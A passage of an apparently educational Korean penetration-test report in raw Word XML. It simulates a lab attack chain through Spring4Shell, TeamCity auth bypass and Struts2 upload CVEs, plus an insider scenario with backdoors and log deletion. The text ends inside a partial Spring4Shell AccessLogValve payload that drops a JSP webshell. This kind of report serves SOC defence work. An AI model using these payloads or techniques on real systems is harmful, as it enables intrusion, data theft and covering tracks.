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51C5A" w:val="clear"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>보안 테스트 보고서</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0192BF"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>SL Cyber-Shield (SCS-EP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="0" w:after="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE 기반 외부 공격 체인 및 내부자 위협 시뮬레이션 보안 진단 결과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94"/>
        <w:gridCol w:w="4394"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="065590" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>프로젝트명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SL Cyber-Shield (SCS-EP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="065590" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>보고서 구분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보안 취약점 테스트 보고서</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="065590" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>테스트 유형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외부 공격 체인 / 내부자 위협 시뮬레이션</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="065590" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>주요 CVE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CVE-2022-22965 / CVE-2024-27198 / CVE-2023-50164</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="065590" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>테스트 환경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Docker 기반 로컬 환경 (Educational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="065590" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr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2026년 03월 28일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F497D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. 개요</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E74B5"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>본 보고서는 SL Factory Innovation Team의 Cyber Security Strategy 프로젝트인 'SL Cyber-Shield (SCS-EP)'의 보안 테스트 시뮬레이션 수행 결과를 기록한 문서이다. SCS-EP는 SOC(Security Operations Center) 고도화를 위한 실전형 APT 시뮬레이션 플랫폼으로, Spring4Shell, TeamCity 인증 우회, Apache Struts2 파일 업로드 취약점 등 실제 공개된 CVE를 연계하여 내부망 침투 및 데이터 탈취 전 과정을 재현한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>본 시뮬레이션은 두 가지 시나리오로 구성된다. 첫 번째는 외부 공격자가 인터넷에 노출된 Spring Boot 애플리케이션의 취약점을 시작점으로 삼아 내부 DB, CI/CD 서버, NAS 스토리지까지 단계적으로 장악하는 '메인 시나리오(CVE 기반 외부 공격 체인)'이며, 두 번째는 내부 권한을 보유한 직원이 업무 접근권한만으로 기업 기밀을 탈취하고 CI/CD 파이프라인에 백도어를 심는 '서브 시나리오(내부자 위협)'이다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. 목적</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E74B5"/>
        </w:pBd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94"/>
        <w:gridCol w:w="4394"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>목적</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="2E74B5" w:val="clear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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>취약점 실증 및 위험 인식 제고</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2022-22965(Spring4Shell), CVE-2024-27198(TeamCity), CVE-2023-50164(Struts2) 등 공개 취약점이 실제 운영 환경에서 어떻게 연쇄 악용될 수 있는지 직접 시연하여 보안 위협의 실재성을 입증한다.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내·외부 위협 시나리오 검증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외부 해커의 CVE 체이닝 공격과 내부자 위협(Insider Threat)의 두 가지 관점에서 조직의 보안 수준과 탐지·대응 역량을 종합적으로 평가한다.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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SOC 역량 고도화 지원</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>시뮬레이션 결과를 기반으로 SIEM 탐지 룰, IDS/IPS 정책, 방화벽 ACL 등 SOC 운영 절차 개선을 위한 구체적인 대응 방안을 도출한다.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9"/>
              </w:rPr>
              <w:t>공급망 보안 리스크 점검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CI/CD 파이프라인(TeamCity, Gitea)과 내부 NAS 스토리지에 대한 접근 통제 적절성을 점검하고 공급망 공격(Supply Chain Attack) 시나리오를 통해 취약 지점을 식별한다.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6"/>
        </w:rPr>
        <w:t>3. 테스트 범위 및 대상</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E74B5"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3.1 테스트 대상 시스템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417"/>
            <w:shd w:fill="2E74B5" w:val="clear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fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>서비스/컴포넌트</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>주소/포트</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="2E74B5" w:val="clear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417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Spring 앱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Spring Boot Web (Victim)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localhost:8011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2022-22965 취약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9"/>
              </w:rPr>
              <w:t>spring-db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MySQL 8.0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spring-db:3306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Spring 앱 DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TeamCity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JetBrains TeamCity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teamcity-server:8111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2024-27198 취약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9"/>
              </w:rPr>
              <w:t>Struts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Apache Struts2 Web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struts:8080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CVE-2023-50164 취약</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>struts-db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MySQL 8.0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struts-db:3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Struts 앱 DB (직원 정보)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9"/>
              </w:rPr>
              <w:t>NAS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SMB 파일 서버 (NAS)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nas:445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설계 도면, 토큰 저장</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gitea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소스코드 저장소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gitea:3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CI/CD 연동 저장소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9"/>
              </w:rPr>
              <w:t>Desktop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Employee Desktop VNC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employee-desktop:6901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내부자 위협 거점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3"/>
        </w:rPr>
        <w:t>3.2 테스트 범위</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>네트워크 침투 테스트: 외부 공격자 관점의 인터넷 노출 서비스(Spring Boot) 취약점 분석</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>웹 애플리케이션 취약점: CVE-2022-22965(Spring4Shell), CVE-2023-50164(Struts2) 파일 업로드 취약점</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>서버 소프트웨어 취약점: CVE-2024-27198(TeamCity 인증 우회) 권한 상승</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>내부 네트워크 횡적 이동(Lateral Movement): Spring → TeamCity → Struts → DB → NAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>내부자 위협: 정상 업무 권한을 보유한 내부자의 기밀 탈취 및 CI/CD 공급망 공격</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>데이터 유출(Exfiltration): 고객 DB, 직원 DB, NAS 설계 도면 탈취 가능성 검증</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. 전체 시나리오별 요약</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E74B5"/>
        </w:pBd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020"/>
            <w:shd w:fill="2E74B5" w:val="clear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814"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p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268"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>주요 취약점/수법</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>영향 자산</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2098"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>시나리오 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>외부 공격 체인 (run.py)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CVE-2022-22965 / CVE-2024-27198 / CVE-2023-50164</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Spring DB, Struts DB, NAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2098"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T1190 / T1078 / T1021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sz w:val="19"/>
              </w:rPr>
              <w:t>시나리오 2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내부자 위협 (sub_run.py)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Misconfiguration / 하드코딩 크리덴셜 / SMB 무단 접근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NAS, spring-db, CI/CD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T1552 / T1565 / T1195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3"/>
        </w:rPr>
        <w:t>4.1 시나리오 1 공격 흐름 요약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929"/>
        <w:gridCol w:w="2929"/>
        <w:gridCol w:w="2929"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p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fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>공격 분류</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>상세 내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>STEP 1-3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초기 침투 (Initial Access)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sz w:val="19"/>
              </w:rPr>
              <w:t>Spring4Shell(CVE-2022-22965)로 AccessLogValve 변조 → yaho4.jsp 웹쉘 생성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9"/>
              </w:rPr>
              <w:t>STEP 4-5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거점 확보 (Foothold)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완성형 웹쉘(health_check.jsp) 배포 → RCE 권한 확보</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>STEP 6-7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정보 수집 및 DB 탈취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sz w:val="19"/>
              </w:rPr>
              <w:t>Spring 설정 파일에서 DB 크리덴셜 추출 → 내부 DB 무단 접근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9"/>
              </w:rPr>
              <w:t>STEP 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횡적 이동 (Lateral Movement)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TeamCity CVE-2024-27198 관리자 계정 생성 → Struts2 CVE-2023-50164 직원 DB 탈취</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>STEP 9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데이터 유출 (Exfiltration)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sz w:val="19"/>
              </w:rPr>
              <w:t>JCIFS-NG 동적 로딩으로 NAS SMB 접근 → 설계 도면 파일 목록 탈취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3"/>
        </w:rPr>
        <w:t>4.2 시나리오 2 공격 흐름 요약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929"/>
        <w:gridCol w:w="2929"/>
        <w:gridCol w:w="2929"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p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fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>공격 분류</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>상세 내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Phase 1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정찰 (Reconnaissance)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sz w:val="19"/>
              </w:rPr>
              <w:t>내부 시스템 정보(id/hostname/uname) 수집, 내부 서비스 포트 스캔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9"/>
              </w:rPr>
              <w:t>Phase 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NAS 기밀 탈취 (Exfiltration)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SMB 마운트된 NAS에서 설계도(PDF), TeamCity 토큰 탈취</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Phase 3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크리덴셜 수집 (Harvesting)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sz w:val="19"/>
              </w:rPr>
              <w:t>application.properties에서 하드코딩된 DB 접속 정보 추출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9"/>
              </w:rPr>
              <w:t>Phase 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내부 DB 접근 (Lateral Move)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획득한 크리덴셜로 spring-db/struts-db 3306 직접 접근, 데이터 덤프</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Phase 5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sz w:val="19"/>
              </w:rPr>
              <w:t>공급망 공격 (Supply Chain)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sz w:val="19"/>
              </w:rPr>
              <w:t>TeamCity 토큰으로 CI/CD 장악 → Gitea 소스코드 push → 자동 배포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9"/>
              </w:rPr>
              <w:t>Phase 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백도어 삽입 및 흔적 은폐 (Persist)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프로덕션 서버 백도어 삽입, git log·bash_history 삭제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497D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. 시나리오 1: CVE 기반 외부 공격 체인 (run.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E74B5"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>본 시나리오는 인터넷에 노출된 Spring Boot 애플리케이션을 초기 침투 지점으로 삼아 RCE 권한을 획득한 후, 내부망 TeamCity 서버와 Apache Struts2 서버를 연쇄적으로 해킹하고 최종적으로 NAS 스토리지의 기밀 파일 목록을 탈취하는 전 과정을 재현한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5-1. 테스트 환경 정보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94"/>
        <w:gridCol w:w="4394"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="2E74B5" w:val="clear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520"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>정보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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>공격자 (Attacker)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sz w:val="19"/>
              </w:rPr>
              <w:t>로컬 호스트 / Python 3.x 스크립트(run.py) 실행 환경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피해자 서버 (Spring)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Docker: ubuntu:22.04 / Spring Boot / Tomcat  →  localhost:8011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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>내부 DB (spring-db)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sz w:val="19"/>
              </w:rPr>
              <w:t>Docker: MySQL 8.0  →  spring-db:3306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CI/CD (TeamCity)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Docker: JetBrains TeamCity  →  teamcity-server:8111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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>웹앱 (Struts2)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sz w:val="19"/>
              </w:rPr>
              <w:t>Docker: Apache Struts2  →  struts:8080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직원 DB (struts-db)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Docker: MySQL 8.0  →  struts-db:3306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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>파일 서버 (NAS)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sz w:val="19"/>
              </w:rPr>
              <w:t>Docker: NAS(SMB)  →  nas:445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실행 스크립트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python3 run.py  (02.AttackScripts/ 하위 모듈 포함)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3"/>
        </w:rPr>
        <w:t>5-2. 시나리오 재현</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="17385E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>STEP 1. Spring4Shell 페이로드 전송 (CVE-2022-22965)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Spring Framework의 Data Binding 취약점(CVE-2022-22965)을 이용해 Tomcat AccessLogValve 속성을 변조하는 페이로드를 타겟 엔드포인트로 전송한다. AccessLogValve의 prefix, suffix, pattern, directory, fileDateFormat 속성을 조작하여 Tomcat 로그 파일 위치와 내용을 제어함으로써 웹쉘 코드를 서버 디스크에 기록할 준비를 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F8D7DA" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="721C24"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>🔴  CVE-2022-22965: Spring Framework 5.3.0~5.3.17, 5.2.x에서 Tomcat 배포 시 발생. ClassLoader를 통한 Data Binding 취약점으로 서버 파일 쓰기가 가능하다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ 페이로드 구조 (stage1_dropper.py)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stage1_dropper.py — ExploitController.run_exploit() 핵심 페이로드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payload = {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"class.module.classLoader.resources.context.parent.pipeline.first.pattern": "%{c2}i %{c1}i",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"class.module.classLoader.resources.context.parent.pipeline.first.prefix":  "yaho4",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"class.module.classLoader.resources.context.parent.pipeline.first.suffix":  ".jsp",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"class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",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"class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": "",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웹쉘 코드는 c1, c2 쿠키 헤더로 분할 전송됨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headers["Cookie"] = "c1=Runtime r=...; c2=&lt;webshell_body&gt;"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STEP 2. 